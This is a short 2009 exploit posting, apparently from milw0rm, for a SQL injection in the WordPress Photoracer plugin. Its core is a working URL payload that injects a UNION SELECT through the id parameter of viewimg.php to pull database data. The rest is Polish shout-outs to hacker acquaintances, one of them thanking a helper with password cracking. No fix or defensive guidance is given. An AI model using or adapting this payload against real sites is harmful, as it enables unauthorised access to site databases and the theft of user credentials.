21 lines
No EOL
459 B
Text
21 lines
No EOL
459 B
Text
Wordpress Photoracer Plugin => SQL injection
|
|
http://wordpress.org/extend/plugins/photoracer/
|
|
|
|
Author: Kacper
|
|
Website: http://devilteam.pl/
|
|
|
|
Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,
|
|
|
|
Pozdro: Ratman, Kopaczka, FDJ
|
|
|
|
Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
|
|
|
|
Vuln:
|
|
|
|
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
|
|
|
|
big thanks str0ke for you!
|
|
|
|
be safe all :)
|
|
|
|
# milw0rm.com [2009-06-15] |